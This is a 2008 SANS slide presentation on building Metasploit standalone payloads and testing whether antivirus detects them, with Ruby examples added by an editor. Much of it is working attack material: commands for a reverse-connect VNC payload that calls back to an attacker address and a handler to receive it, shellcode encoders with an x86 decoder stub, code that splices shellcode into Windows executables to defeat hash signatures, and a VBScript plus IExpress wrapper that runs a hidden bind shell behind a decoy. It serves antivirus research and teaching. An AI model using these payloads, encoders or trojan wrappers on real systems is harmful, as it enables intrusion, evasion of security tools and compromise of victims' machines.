Uploaded 2 Feb 2013

SANS Technology Institute - Candidate for Master of Science Degree

Metasploit Payloads and Antivirus

Mark Baggett, GIAC GSEC GCIH
December 2008


Objectives

Learn how an attacker might use Metasploit standalone payloads against you
See how these payloads are created, used and "trojanized"
Understand what level of protection to expect from your antivirus


How are they used against you?

Can be executed by tricking a user into running the payload, or via an exploit that is not in the framework
Execute a payload on a fully patched system
Use Meterpreter's advanced functionality such as anti-forensics, detection evasion, and pivoting

Scenario:
  Attacker brute-forces the password to a fully patched machine
  Runs a Meterpreter payload and uses it to pivot
  Uses the framework to attack other hosts on the DMZ


msfpayload

Generates payloads in various formats:
  Source code in C, Perl, Ruby and JavaScript
  Hexadecimal (RAW)
  Binary executable formats for Win32; Linux; OS X on Intel, PPC and iPhone

The JavaScript output automatically selects big-endian or little-endian byte order depending upon the processor the payload targets
You can override this with a simple modification to msfpayload (js_be, js_le)


Demonstration

See how these payloads are created


Interacting with payloads

Some payloads will not work standalone: the find_port and find_tag stagers locate the exploit's existing socket (by port, or by a tag sent over it), so there is nothing for them to find when the payload is run on its own
Bind shell payloads can be used outside of the framework; connect to the listening port with any client
Others, such as reverse-connect payloads, require the use of the multi/handler exploit to receive the connection


Using multi/handler

CREATION - LHOST is the attacker's IP, the address the payload will connect back to:

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.100.5 X > vncrev.exe

USE - the handler must listen on that same LHOST. RHOST, the victim's IP, is not needed for a reverse-connect payload, because the victim initiates the connection:

./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.100.5 DisableCourtesyShell=TRUE E


Demonstration

See how these payloads are used


msfencode

Will encode a payload using one of various algorithms
Expects RAW msfpayload output as input

-h  help
-l  list available encoders
-e  encoder to use
-t  output type
-b  characters to avoid
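What -e and -b do, shown in miniature as an added example (this is not Metasploit's encoder code, and the decoder stub's byte layout is this editor's, not shikata_ga_nai's): a single-byte XOR encoder searches for a key whose output avoids every byte given in -b form, prepends a 21-byte x86 jmp/call/pop decoder stub, and refuses to emit a buffer in which either the stub or the encoded bytes still contain a bad character. The sample payload and bad-character list are constructed for the demonstration.

```ruby
require 'set'

# Constructed sample input: eight bytes containing the three characters most
# exploits cannot carry (NUL, LF, CR) plus ordinary code bytes.
SAMPLE_PAYLOAD  = "\x00\x0a\x0d\x41\x42\x43\xff\x90".b
SAMPLE_BADCHARS = '\x00\x0a\x0d'   # same syntax as msfencode -b

# Turn an msfencode-style "-b" spec into a list of byte values.
def parse_badchars(spec)
  spec.scan(/\\x([0-9a-fA-F]{2})/).flatten.map { |h| h.to_i(16) }
end

# First key in 1..255 for which no byte of (payload XOR key) is bad. The key
# itself must also be clean because the decoder stub embeds it. nil if none.
def find_xor_key(payload, badchars)
  bad = badchars.to_set
  (1..255).find do |key|
    !bad.include?(key) && payload.each_byte.none? { |b| bad.include?(b ^ key) }
  end
end

# 21-byte x86 decoder: jmp/call/pop to learn its own address, XOR the
# following `len` bytes in place with `key`, then fall through into them.
# `mov cl, len` limits this stub to payloads of at most 255 bytes.
def decoder_stub(key, len)
  raise ArgumentError, 'stub supports 1..255 byte payloads' unless (1..255).cover?(len)
  [0xEB, 0x0E,                    # jmp short getpc
   0x5E,                          # decoder: pop esi        ; esi -> encoded bytes
   0x31, 0xC9,                    #          xor ecx, ecx
   0xB1, len,                     #          mov cl, len
   0x80, 0x36, key,               # loop:    xor byte [esi], key
   0x46,                          #          inc esi
   0xE2, 0xFA,                    #          loop loop
   0xEB, 0x06,                    #          jmp short encoded
   0x90,                          # pad: makes the first jmp 0x0E, not 0x0D (CR)
   0xE8, 0xED, 0xFF, 0xFF, 0xFF   # getpc:   call decoder    ; pushes &encoded
  ].pack('C*')                    # encoded bytes follow immediately
end

# Encode the payload, prepend the stub, and verify the whole buffer is clean.
# The encoded bytes are clean by construction; the stub can still fail when
# the length byte itself is a bad char (e.g. a 10-byte payload with \x0a banned).
def xor_encode(payload, badchars)
  key = find_xor_key(payload, badchars)
  raise ArgumentError, 'no single-byte XOR key avoids the bad chars' unless key
  encoded = payload.bytes.map { |b| b ^ key }.pack('C*')
  stub = decoder_stub(key, payload.bytesize)
  buffer = stub + encoded
  dirty = buffer.bytes.select { |b| badchars.include?(b) }.uniq
  unless dirty.empty?
    raise ArgumentError, 'stub still contains ' + dirty.map { |b| format('\x%02x', b) }.join
  end
  { key: key, stub: stub, encoded: encoded, buffer: buffer }
end

# What the stub does at run time, in Ruby: recover the original bytes.
def xor_decode(key, encoded)
  encoded.bytes.map { |b| b ^ key }.pack('C*')
end

def encode_demo
  bad = parse_badchars(SAMPLE_BADCHARS)
  result = xor_encode(SAMPLE_PAYLOAD, bad)
  result[:ok] = xor_decode(result[:key], result[:encoded]) == SAMPLE_PAYLOAD
  result
end

if __FILE__ == $PROGRAM_NAME
  r = encode_demo
  puts format('key=0x%02x total=%d bytes round-trip=%s', r[:key], r[:buffer].bytesize, r[:ok])
end
```

A real encoder such as shikata_ga_nai also varies the stub and uses a rolling key, which is why the same payload encodes differently each run; the fixed stub here makes the output reproducible so the bad-character check can be verified by hand.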


msfencode -> Binary

Binary was not a selectable output type from msfencode until September 29th, 2008

Before that there were 3 ways to create a binary:
  Add 3 lines of code to msfencode
  Generate RAW output and use a hex editor to place it in a binary PE format
  Generate C source code and compile it

The -t exe option now wraps the encoded payload in a Windows binary (PE executable)


msfencode (continued)

./msfpayload windows/shell_bind_tcp R | \
./msfencode -e x86/shikata_ga_nai -t exe

./msfpayload windows/shell_bind_tcp R | \
./msfencode -e x86/shikata_ga_nai -b "\x41\x42\x43" -t exe

Rex::Text.to_win32pe() uses /data/templates
Use your own binaries with the "PAYLOAD:" tag
to_win32pe also writes a random value into 4 bytes at position 0x88 of the template header, so each generated executable differs
Roll your own with template.c
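The template step, as an added example (this is not Rex's to_win32pe, which reads data/templates/template.exe; the template here is a constructed stand-in with a dummy header so the code runs offline, and the 2048-byte slot and random filler are this example's assumptions): locate the PAYLOAD: tag, overwrite the slot with the shellcode followed by random filler, and randomize the 4 bytes at 0x88 so that no two generated binaries are byte-identical.

```ruby
PAYLOAD_TAG   = 'PAYLOAD:'.b
PAYLOAD_SLOT  = 2048   # assumed size of the slot reserved after the tag
RANDOM_OFFSET = 0x88   # the 4 header bytes the slide says to_win32pe randomizes

# Constructed stand-in for data/templates/template.exe: 0x100 bytes of dummy
# header, the tag, then a zeroed slot. A real template is built from
# template.c, whose payload buffer starts with the same "PAYLOAD:" marker.
def build_fake_template
  header = "\x00".b * 0x100
  header[0, 2] = 'MZ'.b
  header + PAYLOAD_TAG + ("\x00".b * PAYLOAD_SLOT)
end

# Splice shellcode into the template the way the slide describes: find the
# tag, overwrite the slot (shellcode first, random filler after), then
# randomize 4 bytes at 0x88. The rng is injectable so runs are reproducible.
def splice_payload(template, shellcode, rng = Random.new)
  tag_at = template.index(PAYLOAD_TAG)
  raise ArgumentError, 'template has no PAYLOAD: tag' unless tag_at
  raise ArgumentError, "shellcode exceeds #{PAYLOAD_SLOT}-byte slot" if shellcode.bytesize > PAYLOAD_SLOT
  raise ArgumentError, 'slot runs past end of template' if tag_at + PAYLOAD_SLOT > template.bytesize
  pe = template.b
  filler = rng.bytes(PAYLOAD_SLOT - shellcode.bytesize)
  pe[tag_at, PAYLOAD_SLOT] = shellcode.b + filler
  pe[RANDOM_OFFSET, 4] = [rng.rand(2**32)].pack('V')
  pe
end

# Offset at which spliced shellcode starts (the tag position).
def payload_offset(template)
  template.index(PAYLOAD_TAG)
end

# Constructed shellcode stand-in: 16 int3 instructions (0xCC).
SAMPLE_SHELLCODE = "\xCC".b * 16

# Build two binaries from identical inputs and report what differs: the
# shellcode is the same, the filler and header bytes are not.
def splice_demo
  template = build_fake_template
  a = splice_payload(template, SAMPLE_SHELLCODE, Random.new(1))
  b = splice_payload(template, SAMPLE_SHELLCODE, Random.new(2))
  off = payload_offset(template)
  {
    size: a.bytesize,
    shellcode_at: off,
    same_shellcode: a[off, SAMPLE_SHELLCODE.bytesize] == b[off, SAMPLE_SHELLCODE.bytesize],
    identical: a == b,
    header_randomized: a[RANDOM_OFFSET, 4] != template[RANDOM_OFFSET, 4],
    tag_gone: a.index(PAYLOAD_TAG).nil?
  }
end

if __FILE__ == $PROGRAM_NAME
  p splice_demo
end
```

The randomized filler and header bytes are exactly why a hash-based antivirus signature of one generated binary does not match the next one, while the shellcode bytes at the tag offset are unchanged and remain available to a signature that looks there.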


Turning payloads into trojans

IExpress is a setup utility that comes with Windows XP
It can create packages that visibly execute a benign host program and invisibly execute a malicious payload
All you need is a small VBScript to execute your payload invisibly
Trojan payloads only temporarily avoid antivirus


Payload script

The script:

' Run the decoy visibly (window style 1 = normal window) and the payload
' hidden (window style 0); False means do not wait for either process to exit.
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "mspaint.exe", 1, False
WshShell.Run "bindshell.exe", 0, False

Quick IExpress Demonstration

See how these payloads are "trojanized"



Level of protection to expect from your antivirus

Expected results: low rate of detection for unencoded payloads and no detection for encoded payloads
Actual results: no detection for unencoded payloads or encoded payloads
2 products' heuristics flagged payloads
Pauldotcom Episode 125 at the end of September 2008 found 6 systems detected the payload
My HIPS testing yielded disappointing results
HD Moore has stated that version 3.2 will generate a new Windows binary that is harder to detect


Summary

Metasploit is a powerful framework with a diverse set of tools
Using these tools, attackers can easily create standalone payloads that run on fully patched systems
Antivirus products do not at this time provide adequate protection against Metasploit payloads
My paper is in the SANS reading room, titled "Effectiveness of Antivirus Detecting Metasploit Payloads"